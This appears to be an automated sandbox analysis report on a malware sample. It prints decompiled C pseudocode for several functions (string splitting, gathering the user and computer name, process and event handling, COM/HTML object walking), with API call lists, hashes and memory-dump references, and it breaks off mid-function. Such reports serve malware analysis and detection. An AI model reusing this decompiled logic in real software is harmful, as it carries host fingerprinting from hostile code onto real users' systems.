StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,02F6D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,02F64A8B), ref: 02F699AD
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,02F6D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,02F64A8B), ref: 02F699DF
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,02F6D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,02F64A8B), ref: 02F69A11
StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,02F6D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,02F64A8B), ref: 02F69A43
HeapFree.KERNEL32(00000000,?,00000005,02F6D00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,02F64A8B), ref: 02F69AC3

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e11f4932ce3b5f33d5718938242300c80d14fe377126def307a5ae7f11647d9d
Instruction ID: 2c928a6eae0b0dd63f3851321c36f26b678125eaedd7ef5b786699886fe04491
Opcode Fuzzy Hash: e11f4932ce3b5f33d5718938242300c80d14fe377126def307a5ae7f11647d9d
Instruction Fuzzy Hash: F9515371F10148EEDB10EBB9DE8CD7BB6EDEB886C47680D15E605D7208EBB1D941CA20

Uniqueness

Uniqueness Score: -1.00%

Function 02F67C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02F67C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E02F658BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x2f6c28c);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x2f6c28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}

0x02f67c80
0x02f67c84
0x02f67c86
0x02f67c87
0x02f67c8f
0x02f67c8f
0x02f67c93
0x00000000
0x00000000
0x02f67c8a
0x02f67c8b
0x02f67c8e
0x02f67c8e
0x02f67c9b
0x02f67ca0
0x02f67ca6
0x02f67cae
0x02f67cb4
0x02f67cb6
0x02f67cbb
0x02f67cbf
0x02f67cc1
0x02f67cc4
0x02f67ccb
0x02f67ccb
0x02f67cd1
0x02f67cd5
0x02f67cd8
0x02f67cd9
0x02f67cdb
0x02f67ce3
0x02f67ce7
0x02f67ce7
0x02f67cf4

APIs

StrChrA.SHLWAPI(?,00000020,00000000,03AA95AC,?,?,?,02F64C85,03AA95AC,?,?,?,02F64A8B,?,?,?), ref: 02F67C8F
StrTrimA.SHLWAPI(?,02F6C28C,00000002,?,?,?,02F64C85,03AA95AC,?,?,?,02F64A8B,?,?,?,4D283A53), ref: 02F67CAE
StrChrA.SHLWAPI(?,00000020,?,?,?,02F64C85,03AA95AC,?,?,?,02F64A8B,?,?,?,4D283A53,?), ref: 02F67CB9
StrTrimA.SHLWAPI(00000001,02F6C28C,?,?,?,02F64C85,03AA95AC,?,?,?,02F64A8B,?,?,?,4D283A53,?), ref: 02F67CCB

Strings

S:(M, xrefs: 02F67CD1, 02F67CE3

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID: S:(M
API String ID: 3043112668-2217774225
Opcode ID: 67b0564aa57370068c710bf42d19f5ed4a0fdbcc3b980220ddc1c1e303aa6c47
Instruction ID: c9e8a00b8e4237db478c8a09f03ae96f149c451504f275b5aa3593c49f7abd66
Opcode Fuzzy Hash: 67b0564aa57370068c710bf42d19f5ed4a0fdbcc3b980220ddc1c1e303aa6c47
Instruction Fuzzy Hash: 15015671B453155BF221AE658C4CF37FF99EB95AD4F110519FA9197240DB60C80186A4

Uniqueness

Uniqueness Score: -1.00%

Function 02F6614A, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F6614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02F658BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02F6147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2f65210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02f66158
0x02f6615b
0x02f6615e
0x02f66164
0x02f66169
0x02f6616f
0x02f66177
0x02f6617a
0x02f66180
0x02f66185
0x02f66192
0x02f6619f
0x02f661a3
0x02f661a5
0x02f661a9
0x02f661ac
0x02f661bc
0x02f6620f
0x02f66210
0x02f661be
0x02f661c3
0x02f661c4
0x02f661c9
0x02f661cc
0x02f661df
0x00000000
0x02f661e1
0x02f661e4
0x02f661e9
0x02f661f7
0x02f661fa
0x02f66200
0x02f66205
0x00000000
0x02f66207
0x02f66207
0x02f6620a
0x02f6620a
0x02f66205
0x02f661df
0x02f66215
0x02f66216
0x02f66185
0x02f6621c

APIs

GetUserNameW.ADVAPI32(00000000,02F6520E), ref: 02F6615E
GetComputerNameW.KERNEL32(00000000,02F6520E), ref: 02F6617A

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

GetUserNameW.ADVAPI32(00000000,02F6520E), ref: 02F661B4
GetComputerNameW.KERNEL32(02F6520E,?), ref: 02F661D7
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02F6520E,00000000,02F65210,00000000,00000000,?,?,02F6520E), ref: 02F661FA

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 28230f793d00307310e68acd0451407c6a5d4365fa2a036e553e7c47296bb352
Instruction ID: d0b59a92a16f2ab6e2f6ed9b2a6dd59528b8157599aa16504fe6954d460e5332
Opcode Fuzzy Hash: 28230f793d00307310e68acd0451407c6a5d4365fa2a036e553e7c47296bb352
Instruction Fuzzy Hash: 0A21C7B6D40108FFDB11DFE5C9889AEBBBDEA48244B5044AAE601E7200E734AB44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F69FE7, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02F69FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02F66B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02F6A96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x2f6d12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02f69fe7
0x02f69ff4
0x02f69ff6
0x02f6a059
0x00000000
0x02f6a059
0x02f6a00e
0x02f6a015
0x02f6a021
0x02f6a026
0x02f6a028
0x02f6a02a
0x02f6a02c
0x02f6a02e
0x02f6a030
0x02f6a03c
0x02f6a04c
0x00000000
0x02f6a03e
0x02f6a03e
0x02f6a045
0x02f6a052
0x02f6a052
0x02f6a052
0x02f6a045
0x02f6a03c
0x02f6a057
0x00000000
0x00000000
0x02f6a05d

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02F666AF,?,?,00000000,00000000), ref: 02F6A021
ResetEvent.KERNEL32(?), ref: 02F6A026
GetLastError.KERNEL32 ref: 02F6A03E
GetLastError.KERNEL32(?,?,00000102,02F666AF,?,?,00000000,00000000), ref: 02F6A059

Part of subcall function 02F66B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,02F6A006,?,?,?,?,00000102,02F666AF,?,?,00000000), ref: 02F66B7A
Part of subcall function 02F66B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02F6A006,?,?,?,?,00000102,02F666AF,?), ref: 02F66BD8
Part of subcall function 02F66B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 02F66BE8

SetEvent.KERNEL32(?), ref: 02F6A04C

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
String ID:
API String ID: 1449191863-0
Opcode ID: b17baf9d82cc22e46d2a39f3ffd382b460cb104a9b5bfb364ed2f47fb322a3f9
Instruction ID: fdd117ae58ac80c4a747221ee30637fc246a4752fa6c4844c2971bcce2bef995
Opcode Fuzzy Hash: b17baf9d82cc22e46d2a39f3ffd382b460cb104a9b5bfb364ed2f47fb322a3f9
Instruction Fuzzy Hash: B9016231500201BBDA306A71DE4CF6BB7A9FF48BE4F114A25F791E10E0D721E825DA61

Uniqueness

Uniqueness Score: -1.00%

Function 02F66A7F, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F66A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x2f6d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x2f6d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x2f6d258 = _t6;
					 *0x2f6d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x2f6d254 = _t7;
					if(_t7 == 0) {
						 *0x2f6d254 =  *0x2f6d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x02f66a87
0x02f66a8d
0x02f66a94
0x00000000
0x02f66aee
0x02f66a96
0x02f66a9e
0x02f66aab
0x02f66aab
0x02f66aeb
0x00000000
0x02f66aeb
0x02f66aad
0x02f66aad
0x02f66ab2
0x02f66ac4
0x02f66ac9
0x02f66acf
0x02f66ad5
0x02f66adc
0x02f66ade
0x02f66ade
0x00000000
0x02f66ae5
0x02f66aa7
0x00000000
0x00000000
0x02f66aa9
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02F690D2,?), ref: 02F66A87
GetVersion.KERNEL32 ref: 02F66A96
GetCurrentProcessId.KERNEL32 ref: 02F66AB2
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02F66ACF
GetLastError.KERNEL32 ref: 02F66AEE

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 2592dff900066d97c55233df4c79697595e7eb2ca199c5f37bf42dbb738efdb9
Instruction ID: dd07b0ebcf32443a18b1253756c19606a3a5d6b27a67112da82f29787f59bab0
Opcode Fuzzy Hash: 2592dff900066d97c55233df4c79697595e7eb2ca199c5f37bf42dbb738efdb9
Instruction Fuzzy Hash: B6F0AF70FC034EABDB209F64A91DB25BB64E744BC1F00891BE6A2C61C0D77AC0A1CB15

Uniqueness

Uniqueness Score: -1.00%

Function 02F691B5, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02F691B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2f6d2a4; // 0xb3a5a8
					_t5 = _t103 + 0x2f6e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2f6c298);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2f6d2a4; // 0xb3a5a8
												_t28 = _t109 + 0x2f6e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2f6d2a4; // 0xb3a5a8
														_t33 = _t79 + 0x2f6e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02f691ba
0x02f691c3
0x02f691c4
0x02f691c8
0x02f691ce
0x02f691d4
0x02f691dd
0x02f691e3
0x02f691ed
0x02f691ef
0x02f691f5
0x02f691fa
0x02f69205
0x02f6920b
0x02f69210
0x02f69332
0x02f69216
0x02f69216
0x02f69223
0x02f69229
0x02f6922f
0x02f69233
0x02f69239
0x02f69246
0x02f6924a
0x02f69250
0x02f69253
0x02f6925b
0x02f6925c
0x02f69260
0x02f69264
0x02f69267
0x02f6926a
0x02f69270
0x02f69279
0x02f6927f
0x02f69280
0x02f69283
0x02f69284
0x02f69285
0x02f6928d
0x02f6928e
0x02f6928f
0x02f69291
0x02f69295
0x02f69299
0x00000000
0x00000000
0x02f6929f
0x02f692a8
0x02f692ae
0x02f692b8
0x02f692bc
0x02f692be
0x02f692cb
0x02f692cf
0x02f692d7
0x02f692dc
0x02f692ee
0x02f692f0
0x02f692f6
0x02f692f6
0x02f692ff
0x02f692ff
0x02f69301
0x02f69307
0x02f69307
0x02f6930a
0x02f69310
0x02f69313
0x02f6931c
0x00000000
0x00000000
0x00000000
0x02f6931c
0x02f69270
0x02f6926a
0x02f69253
0x02f69322
0x02f69322
0x02f69328
0x02f69328
0x02f6932e
0x02f6932e
0x02f69337
0x02f6933d
0x02f6933d
0x02f691fa
0x02f69346

APIs

SysAllocString.OLEAUT32(02F6C298), ref: 02F69205
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02F692E6
SysFreeString.OLEAUT32(00000000), ref: 02F692FF
SysFreeString.OLEAUT32(?), ref: 02F6932E

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 312d3a41daab9ef82091350a540b602fe3de36e35859c0fe5450868bde74dc61
Instruction ID: bffa7be1790d61ce5904149dd35970a4f71000fc29bf4baee73348b159a87215
Opcode Fuzzy Hash: 312d3a41daab9ef82091350a540b602fe3de36e35859c0fe5450868bde74dc61
Instruction Fuzzy Hash: E6516D75E00509EFCB00DFA8C98C9AEF7BAFF89744B144589E915EB250D771AD02CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F67664, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02F67664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02F648F0(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02F6748A(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02F67074(_t101,  &_v236, _a8, _t96 - _t81);
					E02F67074(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02F6748A(_t101, 0x2f6d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02F6748A(_a16, _a4);
						E02F62FED(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02F6B088();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02F6B082();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02F66FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02F615CE(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02F6687D(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2f6d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02f67667
0x02f67673
0x02f67679
0x02f6767e
0x02f67682
0x02f677df
0x02f677e3
0x02f677e3
0x02f67688
0x02f6768c
0x02f67690
0x02f67693
0x02f6769e
0x02f676a4
0x02f676a9
0x02f676ac
0x02f676c6
0x02f676d2
0x02f676db
0x02f676e5
0x02f676ea
0x02f676ec
0x02f676ef
0x02f6779d
0x02f677a3
0x02f677b4
0x02f677c7
0x02f677d7
0x00000000
0x02f677dc
0x02f676f8
0x02f676ff
0x02f67703
0x02f67709
0x02f6770b
0x02f6770d
0x02f6770f
0x02f67711
0x02f6771b
0x02f67720
0x02f67722
0x02f67724
0x02f67725
0x02f67726
0x02f67727
0x02f6772e
0x02f67735
0x02f67738
0x02f67738
0x02f67705
0x02f67705
0x02f67705
0x02f67740
0x02f67748
0x02f67751
0x02f67756
0x02f67756
0x02f6775b
0x00000000
0x00000000
0x02f6775d
0x02f67760
0x02f6776a
0x00000000
0x00000000
0x02f6776c
0x02f6776c
0x02f67776
0x02f67756
0x02f6775b
0x00000000
0x00000000
0x00000000
0x02f6775b
0x02f67780
0x02f67783
0x02f67786
0x02f6778d
0x02f6778d
0x02f6779a
0x00000000
0x02f6779a
0x02f67695
0x02f67699
0x02f6769a
0x02f6769c
0x00000000
0x00000000
0x00000000
0x02f6769c
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02F67711
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02F67727
memset.NTDLL ref: 02F677C7
memset.NTDLL ref: 02F677D7

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: f2c9edf016138555fc9200126ec4e1ab25aa76fe7488f40b57316538f7312cce
Instruction ID: 87222672c0ebac40cea7a530a01ba8f77ed9bb8d6863eaaf4eec94820f04ac86
Opcode Fuzzy Hash: f2c9edf016138555fc9200126ec4e1ab25aa76fe7488f40b57316538f7312cce
Instruction Fuzzy Hash: A741A671A00259ABDB10EFA8CC48BFEB775EF45794F108529FA15A7180EB719D44CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02F6A96C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000008,75144D40), ref: 02F6A97E

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

ResetEvent.KERNEL32(?), ref: 02F6A9F2
GetLastError.KERNEL32 ref: 02F6AA15
GetLastError.KERNEL32 ref: 02F6AAC0

Part of subcall function 02F6147E: RtlFreeHeap.NTDLL(00000000,00000000,02F61D11,00000000,?,?,-00000008), ref: 02F6148A

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 9a5f61df9369cf21d32101d8c1b63942a3649f33d09bcc07e5a6fc914528363f
Instruction ID: d469d90d0472fdd17976181b7a6fb20d8ad6ab87b3e5be8afe3700111688214e
Opcode Fuzzy Hash: 9a5f61df9369cf21d32101d8c1b63942a3649f33d09bcc07e5a6fc914528363f
Instruction Fuzzy Hash: 64418FB1A40608FFE7319FA1CD4CEABBBBDEB49B84B14491AF653E1190D771A514CB20

Uniqueness

Uniqueness Score: -1.00%

Function 02F68F08, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E02F68F08(void* __eax) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				intOrPtr _t36;
				intOrPtr* _t37;
				intOrPtr* _t39;
				void* _t53;
				long _t58;
				void* _t59;

				_t59 = __eax;
				_t58 = 0;
				ResetEvent( *(__eax + 0x1c));
				_push( &_v8);
				_push(4);
				_push( &_v20);
				_push( *((intOrPtr*)(_t59 + 0x18)));
				if( *0x2f6d138() != 0) {
					L5:
					if(_v8 == 0) {
						 *((intOrPtr*)(_t59 + 0x30)) = 0;
						L21:
						return _t58;
					}
					 *0x2f6d168(0, 1,  &_v12);
					if(0 != 0) {
						_t58 = 8;
						goto L21;
					}
					_t36 = E02F658BE(0x1000);
					_v16 = _t36;
					if(_t36 == 0) {
						_t58 = 8;
						L18:
						_t37 = _v12;
						 *((intOrPtr*)( *_t37 + 8))(_t37);
						goto L21;
					}
					_push(0);
					_push(_v8);
					_push( &_v20);
					while(1) {
